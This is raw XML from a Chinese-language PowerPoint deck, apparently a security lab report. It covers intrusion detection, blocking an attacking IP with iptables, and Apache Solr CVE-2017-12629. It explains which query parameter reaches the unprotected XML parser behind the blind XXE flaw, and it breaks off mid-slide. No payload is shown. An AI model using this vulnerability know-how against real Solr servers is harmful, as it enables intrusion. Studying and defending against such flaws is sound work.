                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B1646648-899D-4EE9-90DB-811661D3E12E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141411" y="5108795"/>
            <a:ext cx="9618212" cy="914401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13808294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615A8B9-A229-4D93-88CE-4E7E16619887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入侵检测过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CA584680-70A1-49D5-99C6-2E2CD37EAAFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也可以查看安全的访问信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5A23B3B5-6C99-4959-8CC4-6C94C028B73B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5808844" y="2249487"/>
            <a:ext cx="4550104" cy="433139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{EABB0190-BA87-4103-8C56-158C48A8DD27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274087" y="3097552"/>
            <a:ext cx="5100210" cy="367891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39129461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BF6AF15-67A4-4919-8A7D-D63457F12553}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防御过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{886A1FFC-38B3-42E5-BE34-427C2599B695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>iptable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>规则屏蔽恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件中添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>iptable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> check.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>规则添加成功，攻击主机无法连接到靶机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F00F1A25-A038-484F-8831-4B92EE8366F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5906534" y="434975"/>
            <a:ext cx="5838825" cy="3324225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5320351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DF9F4D4-B79E-4BE1-9E52-F3B7C2E7055B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>添加成功后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>规则</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A3C1F5CC-66BF-4161-96F5-3F5BB72E5A14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1417982" y="1774745"/>
            <a:ext cx="7026982" cy="4241742"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6128786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8FC201C-3BBE-49D1-AFEF-ECA9D773D487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CVE-2017-12629</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E2BB576A-5CB3-46CC-8D1C-D76858C1FDB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>是一个开源的搜索服务器。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>语言开发，主要基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Apache Lucene </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>实现。原理大致是文档通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>加到一个搜索集合中。查询该集合也是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>收到一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML/JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>响应来实现。此次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7.1.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>之前版本总共爆出两个漏洞：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>实体扩展漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）和远程命令执行漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37721627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4F0D446-9396-43B6-A5A7-748D4F157598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{0938B02D-B033-4C11-818D-22DE912E543B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1878426"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Lucene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>包含了一个查询解析器，支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>格式进行数据查询。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的查询流程从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SolrDispatchFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dofilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>开始，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>里面，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>QParser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>来处理查询解析，在查询语句中可以构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xmlparse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>就会使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>QparserPlugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的子类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xmlQParsePlugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>来对查询语句进行处理，处理好查询语句后，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>语句传递给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CoreParser.java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ParseXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>函数进行解析。我们可以从图中解析部分的源代码得知，在调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>lucene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>解析器进行解析时，没有对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>和外部实体进行禁用处理，造成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Blind XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。出现问题的代码片段在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>lucene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>queryparser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/java/org/apache/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>lucene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>queryparser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/xml/CoreParser.java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19939240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A5B9543-2BE0-468D-8587-A812F94DCD0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="内容占位符 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{69073116-4A4E-436A-AD7F-8AD77DA73198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224834" y="1683027"/>
            <a:ext cx="9038703" cy="4556456"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="449393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564F139-50A7-482E-B29E-37101D498ABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网站服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CD3809AD-E305-4C08-9A37-4716BFF57E3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="945080" y="1825219"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络监控服务：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Nagios</a:t>
            </a:r>
            <a:r>
